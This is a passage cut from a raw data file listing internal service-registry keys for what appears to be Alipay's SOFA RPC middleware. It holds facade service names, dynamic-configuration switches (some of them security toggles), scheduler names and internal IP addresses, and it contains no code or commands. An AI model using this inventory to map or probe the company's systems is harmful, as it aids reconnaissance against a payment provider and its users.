1.167.220.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.outbound.facade.PhonePoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.holoxCheckVideoQps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.mng.MerchantKeyConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.v1.service.DoneTaskExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.biz.region.meshyconfigrisk.MeshyConfigRiskInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.ipaysales.open.facade.api.contract.ContractConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rdeclarecenter.biz.report.rdc.manager.RdcAdjustRecordManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.CreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.baitiao.api.BtctransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilecodec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdarttool.facade.instruction.DeviceRiskManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdTaskModuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.RehabInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.yunge.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.fund.MatchFundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.charge.addp_tddl_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insunderwritingcore.common.service.BuyLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.dq.InstProductOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradeexprod.common.service.facade.FpRefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_rcservicebus_timeTask#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.quotstore.common.internal.facade.api.InternalQuoteQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.serviceFavourRecomSameCountEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.infosec.api.UserPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_MONITOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.cdTraceSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.156.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intimateprod.common.service.facade.api.IntimateAllInOneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.recommend.RecommendMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fpdecision.dfriskmng.facade.DxRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantsettle.common.service.facade.mngconfig.api.MerchSettleMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.loan.api.RepayFormFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsccalipay.jiebei.facade.service.MutexProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-kbcateringorderprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.193.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-fundtranscore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_IOTCUBE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceExecuteComplexFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.2.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetinsight.common.service.facade.api.SaleStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.isDiscoveryDowngradeSubjectsAutoFengdie,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecashier.service.facade.CreateAndPayCallBackFacade:1.0:ebppprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.toutiaoPropagationLevelHigh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openhomeAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.204.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.89.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.141.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdatabus.facade.RefreshClientConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.backend.api.BackendItemFixFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.databus.OntologyStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airquery.bizdata.BizdataCommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpipe.zqueue:qaZQueue52:twolevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.MonthlyBillDrm.showMonthYield,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:spm-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.opscloud.MrmExecLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.CardAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.SceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:opswarecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.qrcode.AssetQrCodeActiveFacade:1.0:mrchasset_assetQrCodeActive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.PgpKeyManagementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.77.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.newsPropagationLevelHigh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zcore.facade.face.ZFaceService:1.0:zcorebatchalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.CreditCardConfigDrm.creditCardEntranceWhiteUids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openTrustLimitedStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservindustryprod.common.service.facade.reservation.ReservationGiftCpcQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlementprod.common.service.facade.api.EcologyPointDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.SystemConfigFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instdatalink.common.service.facade.datalink.DataSharingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artisan.facade.component.ComponentFacade:1.0:mrchmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.bdcrm.FcSalesPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.cloudatlas.service.CloudAtlasRequireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:client-builder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.148.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acauditcenter.facade.OperationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fundboss.common.service.facade.issue.FundIssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditprod.service.PcreditCertificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:fscagdsad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.area.InstServiceAreaQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoguard.facade.ops.api.OpSnapshotStatisticServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.delivery.RecDeliveryQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.4.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmirror.facade.sync.SyncCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.facade.TransCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.article.share.facade.ArticleShareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.BizOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.autopress.AutoPressTestServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.rest.AcOrderTaskSofaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-MOBILEAPP-WIDGET-EXPIRY-SCAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imigration.common.service.facade.spi.MigrateDataSpi:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cscenter.service.worktask.facade.CsWorkTaskQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.EventConfigPushService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.50.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pvsofabootserver.facade.SofabootRpcServerSpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilegw-spi-adapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.106.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.antFarmPromoSearchCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:newLiquadationBillWithDrawCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLinkQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:xtech#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcomment.pneumonia.rpc.PneumoniaRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iacctrans.service.facade.api.AccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtestcenter.service.facade.kbrtdata.JobOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.CacheDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-charge-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alplatform.common.service.facade.api.WorkFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.mide.common.service.facade.api.ds.DataSetServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.VipQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_GOTONE_MESSAGE_SENDER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_pauseLpaOverDraftProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.undifferentiated.UndifferentiatedSelectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clearingcenter.facade.api.NettingLiquidateInstructionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.smartant.drm.SmartAntParamDrmManager.rebalanceNotifyMaxFailTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.MedicalPaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.loadtest.PurchaseProductSyncLoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:msgopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instservicegovern.common.facade.api.InstFlowControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:activityCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.shopwifi.MobilelbsShopWifiInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.ReceivableManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkguarprod.service.facade.test.MsgProcessorTRTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.156.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.admin.TinyAppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.back.WufuCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:msfluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.open.OpenRoleProxyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.MerchantContractsUpdateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundalliance.common.service.facade.AllianceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.assetflux.service.api.QueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbconfigcenter.common.service.facade.api.meta.MetaUniqueKeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.template.LifeMsgTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.invoice.InvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue7#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlecore.service.facade.SettleFileExport:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.PgpKeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.ModelServiceFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.FinancingAuditManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@tallycore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.etetestcore.service.api.checker.FcassetfluxCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.biz.auth.exchange.manager.AuthTokenExchangeManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.security.api.ImageReviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmWhiteSetConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-gewu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.core.strategy.service.api.RsConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.gfas.core.service.drm.GfasSwitchDrm.emeUnifiedMsgIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.common.AssetSupplierFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariableCompileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeReportWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.181.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_CERTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bketencip.common.service.facade.api.EtenSipProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.actityBeforeDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:sesameCredit_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.ProductSpecAppointmentQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.ComplainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IAntJobItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agap.service.facade.mng.api.LogicAppMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycenter.common.service.facade.SecProdManage:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.isvinfo.KBIsvMerchandiseInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchainconfigcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.tablestore.EcoPageDetectDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.BasicFunctionsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.operator.common.service.facade.OperatorRelAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloudbox.facade.api.TaskEventApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:boxApplyCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mwealthprod.common.service.facade.YouthSMSInvitationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaRuleClassifyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changerequirement.facade.api.ChangeIterationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.couponcoreShutdownTips,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mwealthprod.common.service.facade.YouthOpenAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.UnifiedMsgReverseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.z.api.ArAccountFacade:1.0:zArAccountFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.security.interfaces.facade.api.auth.SecurityAuthService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:nam